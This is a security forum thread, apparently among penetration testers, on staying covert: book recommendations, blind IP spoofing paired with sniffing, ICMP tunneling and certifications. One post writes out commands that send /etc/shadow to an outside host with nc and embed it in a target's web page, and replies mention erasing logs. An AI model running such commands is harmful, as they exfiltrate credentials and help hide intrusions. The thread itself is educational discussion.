Have you read Ninja Hacking by our awesome fellow members?

http://www.amazon.com/Ninja-Hacking-Unconventional-Penetration-Techniques/dp/1597495883/ref=sr_1_1?ie=UTF8&qid=1302370586&sr=8-1

(I unfortunately haven't either, but it's on my list -- just need some time!)

Also, Silence on the Wire is pretty damn interesting: http://www.amazon.com/Silence-Wire-Passive-Reconnaissance-Indirect/dp/1593270461/ref=sr_1_1?ie=UTF8&qid=1302370592&sr=8-1

The Nmap book covers some IDS-evasion material: http://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717/ref=sr_1_1?ie=UTF8&qid=1302370597&sr=8-1

Joe McCray's (again, I unfortunately don't know from first-hand experience) Advanced Penetration Testing course seems awesome too: http://www.learnsecurityonline.com/offerings/courses/222-apt

Um, any of Sil's posts?

Was this in response to my post in the threat on brute-forcing during a web app pen test? I actually just logged back on to see what the response to that was. I expect it to be... interesting

So let's look at the realities of being covert, not really "doable" per-se, but accomplishable. In order to understand being/remaining covert it, you need to understand networking for the technical problems and common sense from the penetration testing - I need to get this done, side.

In order not to "get flagged/caught," you need to know that unless you blindly spoof with 100% assurance that your exploit will work on the other side, it's a very difficult almost impossible task to remain 100% invisible.

As many will know, when you spoof tcp/udp/icmp/ip as a whole, you can never see the return information. You were never and will never be, the intended recipient. So this is what occurs for those who are unfamiliar with it:

Me [10.10.10.1] --> attack target [10.20.30.1] : pretend to be someone else [10.25.50.1]

I can perform this all day long and any responses will look like the following to some degree:

attack target's log: 10.25.50.1 DID_SOMETHING ... respond to 10.25.50.1

I can never see the return data going back and forth in that stream unless I was on the 10.25.50.x or th 10.20.30.x network.

Now let's suppose that I had an account somewhere on any one of these networks. Say, 10.20.30.2. Imagine this was an open network in a park somewhere.

Me:[on a shell at 10.20.30.2] --> attack target [10.20.30.1] : pretend to be someone else [10.25.50.1]

Since I'm on the network, I can turn on a sniffer and depending on how the network is configured, I can see those two hosts responding to one another. (If VLANs aren't properly configured, if I MITMd the router, etc.)

So a potential attack:

Me:[on a shell at 10.20.30.2] --> attack target [10.20.30.1] --> pretend to be 10.25.50.1 && tcpdump 'ip host 10.20.30.2' -C 1024 -i eth??

This will allow me to see what transpires during this attack. So what can I do? I can blind spoof say an exploit as someone else and watch sniffer output results on the way back and forth. If I see that via sniffing the exploit was successful, I know I can continue blindly spoofing to my heart's content. Because I am not visible, even if detected, I am never blocked, someone else is. Also, I'd positively know that my exploit worked, so that any other host I choose to use is successful. On the way back out, I can create reverse connections in the same manner. (Blindly going on knowing I will successfully go out).

Without getting into too much detail about programs or specific commands, imagine me sending a raw nc out out ANYWHERE:

more /etc/shadow | nc google.com 80

Makes no sense eh? Why not? If sniffing on the network I get to see the output. Obviously Google.com has nothing to do with the shadow file. There is no target to attribute the attack to. I still get what I needed.

What about:

more /etc/shadow | sed 's:^:<\!--:g;s:$:-->:g' >> /path/to/target/webserver/index.html

Now the output of the shadow file is an html comment inside of a webpage. You can use a proxy to view the webpage. There are a lot of ways to be covert. BOSH [1] is also good for stuff like this. So its not about "not being detected" as that is difficult. You will either need to blend in with the crowd, or use blind spoofiing + creativity to overcome being blocked.

[1] http://xmpp.org/extensions/xep-0124.html

Not that I've ever had a reason to but I've always been told that's what UDP spoof, fire and forget is for. Makes sense in theory but I would imagine would take some work in a lab beforehand to understand what kind of traffic you should be sending/fake-responding to.

Yeah in almost every environment that locked down all the tcp/udp stuff they almost always allow outbound ICMP, maybe because "ping google.com" is step 2 in their network troubleshooting scripts. I was looking at buying a couple pwn plugs from http://pwnieexpress.com/ and the ability to natively tunnel SSH over ICMP was a big plus for me (If you use the 3G version it will send me a SMS message when the tunnel comes up, how cool is that?). Yes I know this can be done without their solution - but it's already setup more or less.

I started work on CWNA via self study a couple years ago and then got sidetracked by the SANS wireless track (SEC617). It's been on my radar to followup but never got around to it. If I'm not mistaken fellow forum member JrGong is a CWNA. It seems like a good program.

I think sil meant WCNA, the Wireshark cert.

CWNA provides a pretty good foundation for 802.11. However, the CWSP focused a lot on the EAP types and configuration. There wasn't much regarding different attacks, intrusion detection, etc.

Answers to problem always look so easy when they are explained to you... Thanks sil, very good explaination!!!


That was my goal, after reading this post!

Another thing, I guess it pays a lot know what protections are in place. Like sil mentioned, if Tripwire is installed, it's good to know what the tool does and what you can't do. Same thing with antivirus. Knowing which one is installed can probably help you craft your exploits accordingly (I am doing OSCE right now  ). Erasing logs is also another good thing IF it is possible.

Humm, interesting posts...

I am always amazed by people on this forum. Thanks again!!!

Thanks again Sil. I put the "if" in capital letters because I was thinking about remote logging, but this:

This shows another side of being covert.

I now get the point that being "covert" could mean being all dressed up in camouflage and crawling in the woods, but it can also mean walking in plain sight in the middle of a crowd. in addition, you can be "covert" if you walk alone in plain sight, as long as you can delete the video recording tapes!

Thanks again